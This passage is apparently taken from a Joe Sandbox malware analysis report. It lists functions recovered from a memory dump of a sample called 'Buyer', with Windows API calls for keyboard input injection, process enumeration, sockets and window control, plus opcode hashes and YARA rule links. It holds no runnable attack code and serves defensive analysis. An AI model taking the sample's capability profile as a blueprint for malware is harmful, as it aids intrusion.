                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00FD4ED3
                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FD4EDA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                    • String ID: msctls_updown32
                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                    • Opcode ID: 6b99b31afc6afb36fe41217e0b95ec62a91ba46ef669876458b920a0e00c193f
                                                                                                    • Instruction ID: 60eb1dff005567f9f522cd11df6b4edc4e15ae24b9c5980429eb558ae7ae9f9c
                                                                                                    • Opcode Fuzzy Hash: 6b99b31afc6afb36fe41217e0b95ec62a91ba46ef669876458b920a0e00c193f
                                                                                                    • Instruction Fuzzy Hash: 2D212CB5600209AFDB10DF68DC81DAB37AEFB493A4B14005AF9019B351CB75EC11AA60
                                                                                                    Function 00FB5163 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00FB5177
                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00FB51CB
                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,00FDDC1C), ref: 00FB523F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                    • String ID: %lu
                                                                                                    • API String ID: 2507767853-685833217
                                                                                                    • Opcode ID: 047e01ce93f2c5955c7e1b1934d1de9456f9fd76896f2468685dd62c5176ccd4
                                                                                                    • Instruction ID: 0908d01f7af0ba1dc54c8eb3ea4fb18e27a92df0b13e34fa5a0245d33ed3680c
                                                                                                    • Opcode Fuzzy Hash: 047e01ce93f2c5955c7e1b1934d1de9456f9fd76896f2468685dd62c5176ccd4
                                                                                                    • Instruction Fuzzy Hash: 0E318171A00208AFDB10DF64C985EAA7BF8EF08304F144095F809DB352D775EE46DB61
                                                                                                    Function 00FD49AB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00FD4A0F
                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00FD4A24
                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00FD4A31
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID: msctls_trackbar32
                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                    • Opcode ID: 0faaf2fe5a39f5960b0eed0cc52ff6e089886f86ef0d93c018b86daa539d50f6
                                                                                                    • Instruction ID: 98167ab7685bbd92d02e67d2f8f3d69acdcb16813a5f85979ba39eb6ebeb832f
                                                                                                    • Opcode Fuzzy Hash: 0faaf2fe5a39f5960b0eed0cc52ff6e089886f86ef0d93c018b86daa539d50f6
                                                                                                    • Instruction Fuzzy Hash: D8113631680208BFEF205E25CC46FEB3BADEF85B64F010115FA55E72A0D275EC51AB10
                                                                                                    Function 00FA3633 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F47467: _wcslen.LIBCMT ref: 00F4747A
                                                                                                      • Part of subcall function 00FA3489: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00FA34A7
                                                                                                      • Part of subcall function 00FA3489: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FA34B8
                                                                                                      • Part of subcall function 00FA3489: GetCurrentThreadId.KERNEL32 ref: 00FA34BF
                                                                                                      • Part of subcall function 00FA3489: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00FA34C6
                                                                                                    • GetFocus.USER32 ref: 00FA3659
                                                                                                      • Part of subcall function 00FA34D0: GetParent.USER32(00000000), ref: 00FA34DB
                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00FA36A4
                                                                                                    • EnumChildWindows.USER32(?,00FA371C), ref: 00FA36CC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                    • String ID: %s%d
                                                                                                    • API String ID: 1272988791-1110647743
                                                                                                    • Opcode ID: 006a435521a42bee4dbf3e0510290244b028f77890ef0385b5080d003b5cd603
                                                                                                    • Instruction ID: b4bcdd8b0c7fa7f66c96b826feeca346d253f3a072ba487153cacace40e0c295
                                                                                                    • Opcode Fuzzy Hash: 006a435521a42bee4dbf3e0510290244b028f77890ef0385b5080d003b5cd603
                                                                                                    • Instruction Fuzzy Hash: 6611BBF1600209ABCF12BFB08C85EEE3B6A9F45304F044075FD099B292DB749A45AB70
                                                                                                    Function 00FD6042 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FD6081
                                                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FD60AE
                                                                                                    • DrawMenuBar.USER32(?), ref: 00FD60BD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$InfoItem$Draw
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 3227129158-4108050209
                                                                                                    • Opcode ID: 81d81b05a5bf5725de4ab4d4a4342806c02f3d2e76875de2ac9724686a501601
                                                                                                    • Instruction ID: 672141e50c47878ebef755d3a419e30a59cf96fd34aaa4ef87ca7364f812ad59
                                                                                                    • Opcode Fuzzy Hash: 81d81b05a5bf5725de4ab4d4a4342806c02f3d2e76875de2ac9724686a501601
                                                                                                    • Instruction Fuzzy Hash: C9015B72500218EFDB219F60DC48BAE7BB6FF45750F188096E849D6250DB318984FF21
                                                                                                    Function 00FA0706 Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c2256266b927ae8407ed22e2ab98ac0ae87d853954d45359080c61c07a955ef8
                                                                                                    • Instruction ID: 135e0cd2e20bdf6c6afd0383d831694df141846da7bc0e2bd8d883f27b2ad2e0
                                                                                                    • Opcode Fuzzy Hash: c2256266b927ae8407ed22e2ab98ac0ae87d853954d45359080c61c07a955ef8
                                                                                                    • Instruction Fuzzy Hash: B3C17EB5A00206EFDB04CFA4D884EAEB7B9FF49314F108598E405EB251DB35EE41EB90
                                                                                                    Function 00F741D0 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1036877536-0
                                                                                                    • Opcode ID: 9ad14dec4bb4a0c2043c4c5fa7c098021884fe155f7a13ee0405fd2ef3dcf7e8
                                                                                                    • Instruction ID: 07214de47a6db19710bdcd1810529e6f74dac4e2d4b0f300c9092ea88871190c
                                                                                                    • Opcode Fuzzy Hash: 9ad14dec4bb4a0c2043c4c5fa7c098021884fe155f7a13ee0405fd2ef3dcf7e8
                                                                                                    • Instruction Fuzzy Hash: 40A14932D043869FDB11CF58C8917AEBBE5EF51320F14816EE99D9B282C338A941F752
                                                                                                    Function 00FC3BB5 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 1998397398-0
                                                                                                    • Opcode ID: 1181acc30504e332dd219ba93af46426bd6768cc86b6be821eac9d15511a5951
                                                                                                    • Instruction ID: b51ca1b8275ccfe7844d873a3fc60c588841f9e1e1afedba96a504ad518d3815
                                                                                                    • Opcode Fuzzy Hash: 1181acc30504e332dd219ba93af46426bd6768cc86b6be821eac9d15511a5951
                                                                                                    • Instruction Fuzzy Hash: 8EA118756143119FC700EF28C986E2ABBE5BF88750F04855DF98A9B361CB34ED05EB92
                                                                                                    Function 00FA0ABD Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00FE0BF0,?), ref: 00FA0C77
                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00FE0BF0,?), ref: 00FA0C8F
                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00FDDC2C,000000FF,?,00000000,00000800,00000000,?,00FE0BF0,?), ref: 00FA0CB4
                                                                                                    • _memcmp.LIBVCRUNTIME ref: 00FA0CD5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 314563124-0
                                                                                                    • Opcode ID: 0757dddaeaf05e36a33db44f1ec7c1e2414922e4a5f6e0ebf25eb892f573858e
                                                                                                    • Instruction ID: 9b5a27ef111583ab99bef90b7519500ff640619db77543ebac5f1ca3f8383aac
                                                                                                    • Opcode Fuzzy Hash: 0757dddaeaf05e36a33db44f1ec7c1e2414922e4a5f6e0ebf25eb892f573858e
                                                                                                    • Instruction Fuzzy Hash: 488109B5A00109EFCB04DF94D988EEEB7B9FF89315F204558E506EB250DB71AE06DB60
                                                                                                    Function 00FCAE03 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00FCAE33
                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00FCAE41
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00FCAF23
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FCAF32
                                                                                                      • Part of subcall function 00F5E224: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00F83B5C,?), ref: 00F5E24E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1991900642-0
                                                                                                    • Opcode ID: 9deb0a5147b38af7b26485a75fd7067427febcade5c2094f36c07ed6f8d18359
                                                                                                    • Instruction ID: 4b46850398c636c53b0ee072dad4f68722c2c738e52dd348eaba675906f07296
                                                                                                    • Opcode Fuzzy Hash: 9deb0a5147b38af7b26485a75fd7067427febcade5c2094f36c07ed6f8d18359
                                                                                                    • Instruction Fuzzy Hash: 6B5118B1508315AFD350EF24CC86A6BBBE8FF89714F00491DF98997291EB34E904DB92
                                                                                                    Function 00F816E1 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 0b9b53efca81dba3286dac6710ed84cc021bc74dad07afc1ab39c522f9a65038
                                                                                                    • Instruction ID: 26c7abbdcf8f0e934c8f39d458459e21839129e2c95cfa58610116377e340a50
                                                                                                    • Opcode Fuzzy Hash: 0b9b53efca81dba3286dac6710ed84cc021bc74dad07afc1ab39c522f9a65038
                                                                                                    • Instruction Fuzzy Hash: 0D41E532E00105AAEB257E7D8C86AEE3BADFF46770F14471AF418D6291D7784842B762
                                                                                                    Function 00FC225D Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00FC2284
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00FC2292
                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00FC2311
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00FC231B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$socket
                                                                                                    • String ID:
                                                                                                    • API String ID: 1881357543-0
                                                                                                    • Opcode ID: 46495bc11dd69a6c52d05b21ff11103534b61c01ddce8dcadefa2139bad9587a
                                                                                                    • Instruction ID: ecdfbbf5c1bc95338832b73fd74524005ca23abf441ee9f8b459f198ebbfd0f9
                                                                                                    • Opcode Fuzzy Hash: 46495bc11dd69a6c52d05b21ff11103534b61c01ddce8dcadefa2139bad9587a
                                                                                                    • Instruction Fuzzy Hash: 9F41B534600301AFE720AF24CC86F2A7BD5EB44718F54848CF91A9F2D2D776DD41AB90
                                                                                                    Function 00FD69D1 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowRect.USER32(0107D510,?), ref: 00FD6A3B
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00FD6A6E
                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00FD6ADB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3880355969-0
                                                                                                    • Opcode ID: 7e5fa058e5398259e54762f557e8360b866eb3cd602c876bc8530f0db663b1b2
                                                                                                    • Instruction ID: 328aa9d08c7e3d9bffdccf8c79b34cf5024b05b68d6c9f610d99170a5ece7bed
                                                                                                    • Opcode Fuzzy Hash: 7e5fa058e5398259e54762f557e8360b866eb3cd602c876bc8530f0db663b1b2
                                                                                                    • Instruction Fuzzy Hash: 90512D35A00209AFCB25DF68C980AAE7BB6FB85364F14815AF855D7390D734ED41EB90
                                                                                                    Function 00F7B76F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e3e329e5b5e9403103a2259e9536f7113cfd9814d0c7c2817967a09a042ea5c5
                                                                                                    • Instruction ID: dfce8452fc20bf8d92969b54d64c2c015bad4faeeb3d050cf0dbd31bc89f83a4
                                                                                                    • Opcode Fuzzy Hash: e3e329e5b5e9403103a2259e9536f7113cfd9814d0c7c2817967a09a042ea5c5
                                                                                                    • Instruction Fuzzy Hash: 2D411D72900704AFD7249F38CC41B9ABBE9EF85710F20C52FF119DB681D775A902A781
                                                                                                    Function 00FAB158 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00FAB1AD
                                                                                                    • SetKeyboardState.USER32(00000080), ref: 00FAB1C9
                                                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00FAB237
                                                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00FAB289
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 432972143-0
                                                                                                    • Opcode ID: 151c70784f7e52fb8b07d689bcced051832eee443a495e71f1f8a92099e75c78
                                                                                                    • Instruction ID: 2e8f92265c4742e4092e55a9138e65071741f7a6db0d0518abf6cf042cce1542
                                                                                                    • Opcode Fuzzy Hash: 151c70784f7e52fb8b07d689bcced051832eee443a495e71f1f8a92099e75c78
                                                                                                    • Instruction Fuzzy Hash: BF3128B0E402486EFF228F64DC057FE7BE5AB57320F08425BE491961D2C7789945B791
                                                                                                    Function 00FD5A81 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00FD5B12
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FD5B35
                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FD5B42
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00FD5B68
